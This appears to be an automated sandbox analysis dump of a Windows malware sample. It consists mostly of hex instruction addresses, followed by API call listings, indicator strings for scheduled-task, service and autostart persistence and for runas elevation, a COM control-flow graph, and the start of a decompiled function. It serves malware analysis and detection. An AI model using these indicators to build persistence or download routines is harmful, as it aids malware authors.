                                                                                                    0x0041ab2c
                                                                                                    0x0041ab2e
                                                                                                    0x0041ab34
                                                                                                    0x0041ab37
                                                                                                    0x0041ab39
                                                                                                    0x0041ab3b
                                                                                                    0x0041ab3f
                                                                                                    0x0041ab43
                                                                                                    0x0041ab48
                                                                                                    0x0041ab48
                                                                                                    0x0041ab4d
                                                                                                    0x0041ab54
                                                                                                    0x0041ab5b
                                                                                                    0x0041ab5e
                                                                                                    0x0041ab62
                                                                                                    0x0041ab7b
                                                                                                    0x0041ab7d
                                                                                                    0x0041ab64
                                                                                                    0x0041ab67
                                                                                                    0x0041ab67
                                                                                                    0x0041ab68
                                                                                                    0x0041ab6f
                                                                                                    0x0041ab74
                                                                                                    0x0041ab74
                                                                                                    0x0041ab68
                                                                                                    0x0041ab86
                                                                                                    0x0041ab8c
                                                                                                    0x0041ab8f
                                                                                                    0x0041ab91
                                                                                                    0x0041ab98
                                                                                                    0x0041ab9f
                                                                                                    0x0041ab9f
                                                                                                    0x0041aba2
                                                                                                    0x0041aba7
                                                                                                    0x0041abad
                                                                                                    0x0041abb2
                                                                                                    0x0041abb2
                                                                                                    0x0041abc0
                                                                                                    0x0041abc5
                                                                                                    0x0041abc9
                                                                                                    0x0041abcc
                                                                                                    0x0041abd7
                                                                                                    0x0041abd7
                                                                                                    0x0041abd9
                                                                                                    0x0041abe4
                                                                                                    0x0041abf0
                                                                                                    0x0041abf0
                                                                                                    0x0041abf3
                                                                                                    0x0041abf6
                                                                                                    0x0041abfc
                                                                                                    0x0041abfe
                                                                                                    0x0041ac01
                                                                                                    0x0041ac01
                                                                                                    0x0041ac03
                                                                                                    0x0041ac04
                                                                                                    0x0041ac04
                                                                                                    0x0041ac08
                                                                                                    0x0041ac08
                                                                                                    0x0041abf8
                                                                                                    0x0041abf8
                                                                                                    0x0041abf8
                                                                                                    0x0041ac0a
                                                                                                    0x0041ac13
                                                                                                    0x0041ac18
                                                                                                    0x0041ac19
                                                                                                    0x0041ac19
                                                                                                    0x0041ac1e
                                                                                                    0x0041ac28
                                                                                                    0x0041ac2c
                                                                                                    0x0041ac30
                                                                                                    0x0041ac37
                                                                                                    0x0041ac3f
                                                                                                    0x0041ac41
                                                                                                    0x0041ac55
                                                                                                    0x0041ac57
                                                                                                    0x0041ac5d
                                                                                                    0x0041ac60
                                                                                                    0x0041ac62
                                                                                                    0x0041ac64
                                                                                                    0x0041ac68
                                                                                                    0x0041ac6c
                                                                                                    0x0041ac71
                                                                                                    0x0041ac71
                                                                                                    0x0041ac76
                                                                                                    0x0041ac7d
                                                                                                    0x0041ac84
                                                                                                    0x0041ac87
                                                                                                    0x0041ac8b
                                                                                                    0x0041aca4
                                                                                                    0x0041aca6
                                                                                                    0x0041ac8d
                                                                                                    0x0041ac90
                                                                                                    0x0041ac90
                                                                                                    0x0041ac91
                                                                                                    0x0041ac98
                                                                                                    0x0041ac9d
                                                                                                    0x0041ac9d
                                                                                                    0x0041ac91
                                                                                                    0x0041acaf
                                                                                                    0x0041acb5
                                                                                                    0x0041acb8
                                                                                                    0x0041acba
                                                                                                    0x0041acc1
                                                                                                    0x0041acc8
                                                                                                    0x0041acc8
                                                                                                    0x0041accb
                                                                                                    0x0041acd0
                                                                                                    0x0041acd6
                                                                                                    0x0041acdb
                                                                                                    0x0041acdb
                                                                                                    0x0041ace9
                                                                                                    0x0041acee
                                                                                                    0x0041acf2
                                                                                                    0x0041acf5
                                                                                                    0x0041ad00
                                                                                                    0x0041ad00
                                                                                                    0x0041ad02
                                                                                                    0x0041ad0d
                                                                                                    0x0041ad15
                                                                                                    0x0041ad15
                                                                                                    0x0041ad18
                                                                                                    0x0041ad1b
                                                                                                    0x0041ad21
                                                                                                    0x0041ad23
                                                                                                    0x0041ad26
                                                                                                    0x0041ad26
                                                                                                    0x0041ad28
                                                                                                    0x0041ad29
                                                                                                    0x0041ad29
                                                                                                    0x0041ad2d
                                                                                                    0x0041ad2d
                                                                                                    0x0041ad1d
                                                                                                    0x0041ad1d
                                                                                                    0x0041ad1d
                                                                                                    0x0041ad2f
                                                                                                    0x0041ad38
                                                                                                    0x0041ad3d
                                                                                                    0x0041ad3e
                                                                                                    0x0041ad3e
                                                                                                    0x0041ad43
                                                                                                    0x0041ad4d
                                                                                                    0x0041ad51
                                                                                                    0x0041ad55
                                                                                                    0x0041ad5c
                                                                                                    0x0041ad64
                                                                                                    0x0041ad66
                                                                                                    0x0041ad71
                                                                                                    0x0041ad76
                                                                                                    0x0041ad7a
                                                                                                    0x0041ad7c
                                                                                                    0x0041ad7f
                                                                                                    0x0041ad85
                                                                                                    0x0041ad87
                                                                                                    0x0041ad89
                                                                                                    0x0041ad8d
                                                                                                    0x0041ad91
                                                                                                    0x0041ad96
                                                                                                    0x0041ad96
                                                                                                    0x0041ad9b
                                                                                                    0x0041ada2
                                                                                                    0x0041ada9
                                                                                                    0x0041adac
                                                                                                    0x0041adb0
                                                                                                    0x0041adc9
                                                                                                    0x0041adcb
                                                                                                    0x0041adb2
                                                                                                    0x0041adb5
                                                                                                    0x0041adb5
                                                                                                    0x0041adb6
                                                                                                    0x0041adbd
                                                                                                    0x0041adc2
                                                                                                    0x0041adc2
                                                                                                    0x0041adb6
                                                                                                    0x0041add4
                                                                                                    0x0041adda
                                                                                                    0x0041addd
                                                                                                    0x0041addf
                                                                                                    0x0041ade6
                                                                                                    0x0041aded
                                                                                                    0x0041aded
                                                                                                    0x0041adf0
                                                                                                    0x0041adf5
                                                                                                    0x0041adfb
                                                                                                    0x0041ae00
                                                                                                    0x0041ae00
                                                                                                    0x0041ae03
                                                                                                    0x0041ae07
                                                                                                    0x0041ae18
                                                                                                    0x0041ae20
                                                                                                    0x0041ae25
                                                                                                    0x0041ae2e
                                                                                                    0x0041ae37
                                                                                                    0x0041ae3c
                                                                                                    0x0041ae41
                                                                                                    0x0041ae47
                                                                                                    0x0041ae4c
                                                                                                    0x0041ae4c
                                                                                                    0x0041ae4f
                                                                                                    0x0041ae53
                                                                                                    0x0041ae64
                                                                                                    0x0041ae6c
                                                                                                    0x0041ae71
                                                                                                    0x0041ae7d
                                                                                                    0x0041ae82
                                                                                                    0x0041ae87
                                                                                                    0x0041ae8d
                                                                                                    0x0041ae92
                                                                                                    0x0041ae92
                                                                                                    0x0041ae95
                                                                                                    0x0041ae99
                                                                                                    0x0041aeaa
                                                                                                    0x0041aeb2
                                                                                                    0x0041aeb7
                                                                                                    0x0041aec3
                                                                                                    0x0041aec8
                                                                                                    0x0041aecd
                                                                                                    0x0041aed3
                                                                                                    0x0041aed8
                                                                                                    0x0041aed8
                                                                                                    0x0041aedb
                                                                                                    0x0041aedf
                                                                                                    0x0041aef0
                                                                                                    0x0041aef8
                                                                                                    0x0041aefd
                                                                                                    0x0041af09
                                                                                                    0x0041af0e
                                                                                                    0x0041af13
                                                                                                    0x0041af19
                                                                                                    0x0041af1e
                                                                                                    0x0041af1e
                                                                                                    0x0041af21
                                                                                                    0x0041af25
                                                                                                    0x0041af36
                                                                                                    0x0041af3e
                                                                                                    0x0041af43
                                                                                                    0x0041af4f
                                                                                                    0x0041af54
                                                                                                    0x0041af59
                                                                                                    0x0041af5f
                                                                                                    0x0041af64
                                                                                                    0x0041af64
                                                                                                    0x0041af67
                                                                                                    0x0041af6b
                                                                                                    0x0041af7c
                                                                                                    0x0041af84
                                                                                                    0x0041af89
                                                                                                    0x0041af95
                                                                                                    0x0041af9a
                                                                                                    0x0041af9f
                                                                                                    0x0041afa5
                                                                                                    0x0041afaa
                                                                                                    0x0041afaa
                                                                                                    0x0041afad
                                                                                                    0x0041afb1
                                                                                                    0x0041afc2
                                                                                                    0x0041afca
                                                                                                    0x0041afcf
                                                                                                    0x0041afdb
                                                                                                    0x0041afe0
                                                                                                    0x0041afe5
                                                                                                    0x0041afeb
                                                                                                    0x0041aff0
                                                                                                    0x0041aff0
                                                                                                    0x0041affc
                                                                                                    0x0041b00e
                                                                                                    0x0041b01a
                                                                                                    0x0041b020
                                                                                                    0x0041b029
                                                                                                    0x0041b037
                                                                                                    0x0041b045
                                                                                                    0x0041b04c
                                                                                                    0x0041b04c
                                                                                                    0x0041b054
                                                                                                    0x0041b05d
                                                                                                    0x0041b06b
                                                                                                    0x0041b077
                                                                                                    0x0041b080
                                                                                                    0x0041b08e
                                                                                                    0x0041b09a
                                                                                                    0x0041b0a3
                                                                                                    0x0041b0b1
                                                                                                    0x0041b0bd
                                                                                                    0x0041b0c6
                                                                                                    0x0041b0d4
                                                                                                    0x0041b0e0
                                                                                                    0x0041b0e9
                                                                                                    0x0041b0f7
                                                                                                    0x0041b103
                                                                                                    0x0041b10c
                                                                                                    0x0041b111
                                                                                                    0x0041b111
                                                                                                    0x0041b11b
                                                                                                    0x0041b120
                                                                                                    0x0041b124
                                                                                                    0x0041b12b
                                                                                                    0x0041b130
                                                                                                    0x0041b136
                                                                                                    0x0041b13f
                                                                                                    0x0041b13f
                                                                                                    0x0041b150
                                                                                                    0x0041b159
                                                                                                    0x0041b169
                                                                                                    0x0041b16e
                                                                                                    0x0041b178
                                                                                                    0x0041b17d
                                                                                                    0x0041b181
                                                                                                    0x0041b190
                                                                                                    0x0041b19a
                                                                                                    0x0041b19f
                                                                                                    0x0041b1a0
                                                                                                    0x0041b1a0
                                                                                                    0x0041b1a9
                                                                                                    0x0041b1ba
                                                                                                    0x0041b1c4
                                                                                                    0x0041b1c9
                                                                                                    0x0041b1d3
                                                                                                    0x0041b1d8
                                                                                                    0x0041b1e5
                                                                                                    0x0041b1ee
                                                                                                    0x0041b1f3
                                                                                                    0x0041b20a
                                                                                                    0x0041b21d
                                                                                                    0x0041b222
                                                                                                    0x0041b224
                                                                                                    0x0041b230
                                                                                                    0x0041b23b
                                                                                                    0x0041b240
                                                                                                    0x0041b246
                                                                                                    0x0041b251
                                                                                                    0x0041b259
                                                                                                    0x0041b260
                                                                                                    0x0041b269
                                                                                                    0x0041b27d
                                                                                                    0x0041b28c
                                                                                                    0x0041b291
                                                                                                    0x0041b297
                                                                                                    0x0041b299
                                                                                                    0x0041b29f
                                                                                                    0x0041b2af
                                                                                                    0x0041b2b4
                                                                                                    0x0041b2bb
                                                                                                    0x0041b2c7
                                                                                                    0x0041b2d0
                                                                                                    0x0041b2e8
                                                                                                    0x0041b2ed
                                                                                                    0x0041b2ed
                                                                                                    0x0041b230
                                                                                                    0x0041b2fd
                                                                                                    0x0041b303
                                                                                                    0x0041b30c
                                                                                                    0x0041b314
                                                                                                    0x0041b31d
                                                                                                    0x0041b322
                                                                                                    0x0041b336
                                                                                                    0x0041b33e
                                                                                                    0x0041b346
                                                                                                    0x0041b34b
                                                                                                    0x0041b34d
                                                                                                    0x0041b35f
                                                                                                    0x0041b369
                                                                                                    0x0041b36b
                                                                                                    0x0041b374
                                                                                                    0x0041b389
                                                                                                    0x0041b392
                                                                                                    0x0041b3a0
                                                                                                    0x0041b3ae
                                                                                                    0x0041b3b7
                                                                                                    0x0041b3c5
                                                                                                    0x0041b3dd
                                                                                                    0x0041b3e2
                                                                                                    0x0041b3e4
                                                                                                    0x0041b3ea
                                                                                                    0x0041b3f0
                                                                                                    0x0041b3fa
                                                                                                    0x0041b40c
                                                                                                    0x0041b418
                                                                                                    0x0041b41d
                                                                                                    0x0041b422
                                                                                                    0x0041b428
                                                                                                    0x0041b42d
                                                                                                    0x0041b43d
                                                                                                    0x0041b443
                                                                                                    0x0041b449
                                                                                                    0x0041b44f
                                                                                                    0x0041b45d
                                                                                                    0x0041b466
                                                                                                    0x0041b47e
                                                                                                    0x0041b483
                                                                                                    0x0041b483
                                                                                                    0x0041b3f0
                                                                                                    0x0041b495
                                                                                                    0x0041b49a
                                                                                                    0x0041b4b3
                                                                                                    0x0041b4bb
                                                                                                    0x0041b4bd
                                                                                                    0x0041b4c5
                                                                                                    0x0041b4cd
                                                                                                    0x0041b4d7
                                                                                                    0x0041b4e7
                                                                                                    0x0041b4e9
                                                                                                    0x0041b4e9
                                                                                                    0x0041b4c5
                                                                                                    0x0041b4ed
                                                                                                    0x0041b4fe
                                                                                                    0x0041b500
                                                                                                    0x0041b509
                                                                                                    0x0041b510
                                                                                                    0x0041b520
                                                                                                    0x0041b522
                                                                                                    0x0041b524
                                                                                                    0x0041b526
                                                                                                    0x0041b52e
                                                                                                    0x0041b540
                                                                                                    0x0041b542
                                                                                                    0x0041b542
                                                                                                    0x0041b526
                                                                                                    0x0041b54e
                                                                                                    0x0041b554
                                                                                                    0x0041b554
                                                                                                    0x0041b510
                                                                                                    0x0041b55b
                                                                                                    0x0041b560
                                                                                                    0x0041b562
                                                                                                    0x0041b56b
                                                                                                    0x0041b570
                                                                                                    0x0041b580
                                                                                                    0x0041b582
                                                                                                    0x0041b584
                                                                                                    0x0041b586
                                                                                                    0x0041b58e
                                                                                                    0x0041b5a0
                                                                                                    0x0041b5a2
                                                                                                    0x0041b5a2
                                                                                                    0x0041b586
                                                                                                    0x0041b5ae
                                                                                                    0x0041b5b4
                                                                                                    0x0041b5b4
                                                                                                    0x0041b570
                                                                                                    0x0041b5bb
                                                                                                    0x0041b5c2
                                                                                                    0x0041b5c7
                                                                                                    0x0041b5c9
                                                                                                    0x0041b5c9
                                                                                                    0x0041b5ce
                                                                                                    0x0041b5d0
                                                                                                    0x0041b5d3
                                                                                                    0x0041b5d3
                                                                                                    0x0041b5d9
                                                                                                    0x0041b5e4
                                                                                                    0x0041b34f
                                                                                                    0x0041b34f
                                                                                                    0x0041b34f
                                                                                                    0x0041b5ed
                                                                                                    0x0041b5f9
                                                                                                    0x0041b605
                                                                                                    0x0041b611
                                                                                                    0x0041b61d
                                                                                                    0x0041a9d1
                                                                                                    0x0041a9d1
                                                                                                    0x0041a9d1
                                                                                                    0x0041b629
                                                                                                    0x0041a624
                                                                                                    0x0041a624
                                                                                                    0x0041a62a
                                                                                                    0x0041a62c
                                                                                                    0x00000000
                                                                                                    0x0041a632
                                                                                                    0x0041a63f
                                                                                                    0x0041a652
                                                                                                    0x0041a661
                                                                                                    0x0041a66f
                                                                                                    0x0041a67b
                                                                                                    0x0041a686
                                                                                                    0x0041a68d
                                                                                                    0x0041a697
                                                                                                    0x0041a6a2
                                                                                                    0x0041a6a9
                                                                                                    0x0041a6ac
                                                                                                    0x0041a6b0
                                                                                                    0x0041a6b2
                                                                                                    0x0041a6b2
                                                                                                    0x0041a6b4
                                                                                                    0x0041a6c3
                                                                                                    0x0041a6ce
                                                                                                    0x0041a6d9
                                                                                                    0x0041a6df
                                                                                                    0x0041a6e1
                                                                                                    0x0041a6fe
                                                                                                    0x0041a6fe
                                                                                                    0x00000000
                                                                                                    0x0041a6e3
                                                                                                    0x0041a6e3
                                                                                                    0x0041a6e3
                                                                                                    0x0041a6e1
                                                                                                    0x0041a62c
                                                                                                    0x0041a61e
                                                                                                    0x0041a612
                                                                                                    0x0041a60a
                                                                                                    0x0041b635
                                                                                                    0x0041b641
                                                                                                    0x0041b64d
                                                                                                    0x0041b659
                                                                                                    0x0041b666
                                                                                                    0x0041a466
                                                                                                    0x0041a46d
                                                                                                    0x0041a46f
                                                                                                    0x0041a47c
                                                                                                    0x0041a47c
                                                                                                    0x0041a196
                                                                                                    0x0041a196
                                                                                                    0x0041a19d
                                                                                                    0x0041a1a1
                                                                                                    0x0041a1a7
                                                                                                    0x0041a1b4
                                                                                                    0x0041a1bc
                                                                                                    0x0041a1c1
                                                                                                    0x0041a1c4
                                                                                                    0x0041a1c6
                                                                                                    0x0041a1ca
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0041a1df
                                                                                                    0x0041a1eb
                                                                                                    0x0041a1f3
                                                                                                    0x0041a201
                                                                                                    0x0041a20b
                                                                                                    0x0041a20e
                                                                                                    0x0041a217
                                                                                                    0x0041a21a
                                                                                                    0x0041a21f
                                                                                                    0x0041a222
                                                                                                    0x0041a226
                                                                                                    0x0041a323
                                                                                                    0x0041a323
                                                                                                    0x0041a328
                                                                                                    0x0041a32c
                                                                                                    0x0041a32f
                                                                                                    0x0041a333
                                                                                                    0x0041a337
                                                                                                    0x0041a1b0
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0041a22e
                                                                                                    0x0041a236
                                                                                                    0x0041a23b
                                                                                                    0x0041a23e
                                                                                                    0x0041a240
                                                                                                    0x0041a244
                                                                                                    0x0041a2d5
                                                                                                    0x0041a2da
                                                                                                    0x0041a2dd
                                                                                                    0x0041a2df
                                                                                                    0x0041a2f4
                                                                                                    0x0041a2f9
                                                                                                    0x0041a2fc
                                                                                                    0x0041a2fe
                                                                                                    0x0041a313
                                                                                                    0x0041a318
                                                                                                    0x0041a31b
                                                                                                    0x0041a31d
                                                                                                    0x0041a361
                                                                                                    0x0041a371
                                                                                                    0x0041a373
                                                                                                    0x0041a380
                                                                                                    0x0041a38f
                                                                                                    0x0041a395
                                                                                                    0x0041a3a3
                                                                                                    0x0041a3a5
                                                                                                    0x0041a3a7
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0041a3af
                                                                                                    0x0041a3b8
                                                                                                    0x0041a3c7
                                                                                                    0x0041a3c9
                                                                                                    0x00000000
                                                                                                    0x0041a3cb
                                                                                                    0x0041a3cb
                                                                                                    0x0041a3d0
                                                                                                    0x0041a3d2
                                                                                                    0x0041a3e3
                                                                                                    0x0041a3f0
                                                                                                    0x0041a3f2
                                                                                                    0x0041a3ff
                                                                                                    0x0041a3d4
                                                                                                    0x0041a3d6
                                                                                                    0x0041a3dc
                                                                                                    0x00000000
                                                                                                    0x0041a3dc
                                                                                                    0x0041a3d2
                                                                                                    0x00000000
                                                                                                    0x0041a3c9
                                                                                                    0x0041a406
                                                                                                    0x0041a40e
                                                                                                    0x0041a41b
                                                                                                    0x0041a41d
                                                                                                    0x0041a42b
                                                                                                    0x0041a436
                                                                                                    0x0041a43d
                                                                                                    0x0041a44a
                                                                                                    0x0041a44c
                                                                                                    0x0041a459
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0041a300
                                                                                                    0x0041a300
                                                                                                    0x00000000
                                                                                                    0x0041a300
                                                                                                    0x0041a2e1
                                                                                                    0x0041a2e1
                                                                                                    0x0041a31f
                                                                                                    0x0041a31f
                                                                                                    0x00000000
                                                                                                    0x0041a31f
                                                                                                    0x0041a24a
                                                                                                    0x0041a24e
                                                                                                    0x0041a25a
                                                                                                    0x0041a267
                                                                                                    0x0041a282
                                                                                                    0x0041a28c
                                                                                                    0x0041a293
                                                                                                    0x0041a2a8
                                                                                                    0x0041a2b2
                                                                                                    0x0041a2b9
                                                                                                    0x0041a2be
                                                                                                    0x0041a2c1
                                                                                                    0x0041a2c4
                                                                                                    0x0041a2c8
                                                                                                    0x00000000
                                                                                                    0x0041a2c8
                                                                                                    0x00000000
                                                                                                    0x0041a244
                                                                                                    0x0041a1b4
                                                                                                    0x0041a190
                                                                                                    0x0041a05f
                                                                                                    0x00419fb4
                                                                                                    0x00419fb4
                                                                                                    0x00419fc1
                                                                                                    0x00419fc1
                                                                                                    0x00000000

                                                                                                    APIs
                                                                                                      • Part of subcall function 0040CF10: _memset.LIBCMT ref: 0040CF4A
                                                                                                      • Part of subcall function 0040CF10: InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0040CF5F
                                                                                                      • Part of subcall function 0040CF10: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040CFA6
                                                                                                    • GetCurrentProcess.KERNEL32 ref: 00419FC4
                                                                                                    • GetLastError.KERNEL32 ref: 00419FD2
                                                                                                    • SetPriorityClass.KERNEL32(00000000,00000080), ref: 00419FDA
                                                                                                    • GetLastError.KERNEL32 ref: 00419FE4
                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000400,00000400,?,?,00000000,0054D9B0,?), ref: 0041A0BB
                                                                                                    • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041A0C2
                                                                                                    • GetCommandLineW.KERNEL32(?,?), ref: 0041A161
                                                                                                      • Part of subcall function 004124E0: CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004124FE
                                                                                                      • Part of subcall function 004124E0: GetLastError.KERNEL32 ref: 00412509
                                                                                                      • Part of subcall function 004124E0: CloseHandle.KERNEL32 ref: 0041251C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.651464956.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.651464956.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$FileInternetOpen$ClassCloseCommandCreateCurrentHandleLineModuleMutexNamePathPriorityProcessRemoveSpec_memset
                                                                                                    • String ID: IsNotAutoStart$ IsNotTask$%username%$--Admin$--AutoStart$--ForNetRes$--Service$--Task$<$C:\Program Files (x86)\Google\$C:\Program Files (x86)\Internet Explorer\$C:\Program Files (x86)\Mozilla Firefox\$C:\Program Files\Google\$C:\Program Files\Internet Explorer\$C:\Program Files\Mozilla Firefox\$C:\Windows\$D:\Program Files (x86)\Google\$D:\Program Files (x86)\Internet Explorer\$D:\Program Files (x86)\Mozilla Firefox\$D:\Program Files\Google\$D:\Program Files\Internet Explorer\$D:\Program Files\Mozilla Firefox\$D:\Windows\$F:\$I:\5d2860c89d774.jpg$IsAutoStart$IsTask$X1P$list<T> too long$runas$x*P$x2Q${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}$7P
                                                                                                    • API String ID: 2957410896-3144399390
                                                                                                    • Opcode ID: 5654f1f0d8902897548b635c0c3de12d41863b9e7f9f148f59327b5af1546f90
                                                                                                    • Instruction ID: ef0c4ad91a93ebed44a25fa424fadbe3f4bc75453965ff7ad5f6b92dd0de7051
                                                                                                    • Opcode Fuzzy Hash: 5654f1f0d8902897548b635c0c3de12d41863b9e7f9f148f59327b5af1546f90
                                                                                                    • Instruction Fuzzy Hash: 99D2F670604341ABD710EF21D895BDF77E5BF94308F00492EF48587291EB78AA99CB9B
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 688 40d240-40d274 CoInitialize 689 40d276-40d278 688->689 690 40d27d-40d2dd CoInitializeSecurity call 414690 CoCreateInstance 688->690 692 40da8e-40da92 689->692 697 40d2e3-40d3ca VariantInit * 4 VariantClear * 4 690->697 698 40da3c-40da44 CoUninitialize 690->698 693 40da94-40da9c call 422587 692->693 694 40da9f-40dab1 692->694 693->694 704 40d3e2-40d3fe call 40b140 697->704 705 40d3cc-40d3dd CoUninitialize 697->705 700 40da69-40da6d 698->700 702 40da7a-40da8a 700->702 703 40da6f-40da77 call 422587 700->703 702->692 703->702 711 40d400-40d402 704->711 712 40d404 704->712 705->700 713 40d406-40d424 call 40b1d0 711->713 712->713 717 40d426-40d437 CoUninitialize 713->717 718 40d43c-40d451 call 40b140 713->718 717->700 722 40d453-40d455 718->722 723 40d457 718->723 724 40d459-40d494 call 40b1d0 722->724 723->724 730 40d496-40d4a7 CoUninitialize 724->730 731 40d4ac-40d4c2 724->731 730->700 734 40d4c8-40d4dd call 40b140 731->734 735 40da2a-40da37 731->735 739 40d4e3 734->739 740 40d4df-40d4e1 734->740 735->698 741 40d4e5-40d508 call 40b1d0 739->741 740->741 741->735 746 40d50e-40d524 741->746 746->735 748 40d52a-40d542 746->748 748->735 751 40d548-40d55e 748->751 751->735 753 40d564-40d57c 751->753 753->735 756 40d582-40d59b 753->756 756->735 758 40d5a1-40d5b6 call 40b140 756->758 761 40d5b8-40d5ba 758->761 762 40d5bc 758->762 763 40d5be-40d5e1 call 40b1d0 761->763 762->763 763->735 768 40d5e7-40d5fd 763->768 768->735 770 40d603-40d626 768->770 770->735 773 40d62c-40d651 770->773 773->735 776 40d657-40d666 773->776 776->735 778 40d66c-40d681 call 40b140 776->778 781 40d683-40d685 778->781 782 40d687 778->782 783 40d689-40d6a3 call 40b1d0 781->783 782->783 783->735 787 40d6a9-40d6be call 40b140 783->787 790 40d6c0-40d6c2 787->790 791 40d6c4 787->791 792 40d6c6-40d6e0 call 40b1d0 790->792 791->792 792->735 796 40d6e6-40d6f4 792->796 796->735 798 40d6fa-40d70f call 40b140 796->798 801 40d711-40d713 798->801 802 40d715 798->802 803 40d717-40d731 call 40b1d0 801->803 802->803 803->735 807 40d737-40d74c call 40b140 803->807 810 40d752 807->810 811 40d74e-40d750 807->811 812 40d754-40d76e call 40b1d0 810->812 811->812 812->735 816 40d774-40d7ce call 423aaf call 423551 call 4228e0 call 412c40 call 412900 812->816 827 40d7d0 816->827 828 40d7d2-40d7e3 call 40b140 816->828 827->828 831 40d7e5-40d7e7 828->831 832 40d7e9 828->832 833 40d7eb-40d819 call 40b1d0 call 413210 831->833 832->833 833->735 840 40d81f-40d835 833->840 840->735 842 40d83b-40d85e 840->842 842->735 845 40d864-40d889 842->845 845->735 848 40d88f-40d8ab call 40b140 845->848 851 40d8b1 848->851 852 40d8ad-40d8af 848->852 853 40d8b3-40d8cd call 40b1d0 851->853 852->853 857 40d8dd-40d8f2 call 40b140 853->857 858 40d8cf-40d8d8 853->858 862 40d8f4-40d8f6 857->862 863 40d8f8 857->863 858->735 864 40d8fa-40d91d call 40b1d0 862->864 863->864 864->735 869 40d923-40d98d call 40b400 VariantInit * 2 call 40b140 864->869 874 40d993 869->874 875 40d98f-40d991 869->875 876 40d995-40da0e call 40b1d0 VariantClear * 3 874->876 875->876 880 40da10-40da27 call 42052a 876->880 881 40da46-40da67 CoUninitialize 876->881 880->735 881->700
                                                                                                    C-Code - Quality: 58%
                                                                                                    			E0040D240(void* __ecx, char _a4, intOrPtr _a24) {
                                                                                                    				char _v8;
                                                                                                    				intOrPtr _v16;
                                                                                                    				void* _v20;
                                                                                                    				void* _v24;
                                                                                                    				char _v28;
                                                                                                    				void* _v32;
                                                                                                    				char _v33;
                                                                                                    				void* _v40;
                                                                                                    				void* _v44;
                                                                                                    				void* _v48;
                                                                                                    				void* _v52;
                                                                                                    				void* _v56;
                                                                                                    				void* _v60;
                                                                                                    				void* _v64;
                                                                                                    				void* _v68;
                                                                                                    				void* _v72;
                                                                                                    				void* _v76;
                                                                                                    				void* _v80;
                                                                                                    				char _v92;
                                                                                                    				void* _v96;
                                                                                                    				char _v100;
                                                                                                    				char _v104;
                                                                                                    				short _v120;
                                                                                                    				char _v140;
                                                                                                    				char _v156;
                                                                                                    				char _v172;
                                                                                                    				char _v228;
                                                                                                    				char _v244;
                                                                                                    				char _v324;
                                                                                                    				long _v1348;
                                                                                                    				void* __ebx;
                                                                                                    				void* __edi;
                                                                                                    				void* __esi;
                                                                                                    				intOrPtr _t222;
                                                                                                    				short _t226;
                                                                                                    				short _t243;
                                                                                                    				intOrPtr* _t248;
                                                                                                    				intOrPtr* _t249;
                                                                                                    				intOrPtr* _t250;
                                                                                                    				short _t251;
                                                                                                    				intOrPtr* _t253;
                                                                                                    				intOrPtr* _t254;
                                                                                                    				intOrPtr* _t255;
                                                                                                    				intOrPtr* _t258;
                                                                                                    				short _t259;
                                                                                                    				intOrPtr* _t261;
                                                                                                    				intOrPtr* _t263;
                                                                                                    				intOrPtr* _t265;
                                                                                                    				intOrPtr* _t267;
                                                                                                    				intOrPtr* _t268;
                                                                                                    				intOrPtr* _t269;
                                                                                                    				short _t270;
                                                                                                    				intOrPtr* _t273;
                                                                                                    				short _t274;
                                                                                                    				intOrPtr* _t275;
                                                                                                    				short _t276;
                                                                                                    				intOrPtr* _t278;
                                                                                                    				short _t279;
                                                                                                    				intOrPtr* _t280;
                                                                                                    				short _t281;
                                                                                                    				intOrPtr* _t283;
                                                                                                    				intOrPtr* _t285;
                                                                                                    				intOrPtr* _t286;
                                                                                                    				intOrPtr* _t287;
                                                                                                    				short _t288;
                                                                                                    				intOrPtr* _t291;
                                                                                                    				short _t292;
                                                                                                    				intOrPtr* _t293;
                                                                                                    				short _t294;
                                                                                                    				intOrPtr* _t296;
                                                                                                    				short _t297;
                                                                                                    				intOrPtr* _t299;
                                                                                                    				intOrPtr* _t301;
                                                                                                    				intOrPtr* _t302;
                                                                                                    				intOrPtr* _t303;
                                                                                                    				short _t304;
                                                                                                    				intOrPtr* _t306;
                                                                                                    				intOrPtr* _t307;
                                                                                                    				intOrPtr* _t308;
                                                                                                    				short _t309;
                                                                                                    				intOrPtr* _t311;
                                                                                                    				intOrPtr* _t313;
                                                                                                    				intOrPtr* _t314;
                                                                                                    				intOrPtr* _t315;
                                                                                                    				short _t316;
                                                                                                    				intOrPtr* _t318;
                                                                                                    				intOrPtr* _t319;
                                                                                                    				intOrPtr* _t320;
                                                                                                    				short _t321;
                                                                                                    				void* _t327;
                                                                                                    				intOrPtr* _t332;
                                                                                                    				intOrPtr* _t333;
                                                                                                    				intOrPtr* _t334;
                                                                                                    				intOrPtr* _t335;
                                                                                                    				short _t336;
                                                                                                    				intOrPtr* _t340;
                                                                                                    				short _t341;
                                                                                                    				intOrPtr* _t342;
                                                                                                    				short _t343;
                                                                                                    				intOrPtr* _t345;
                                                                                                    				short _t346;
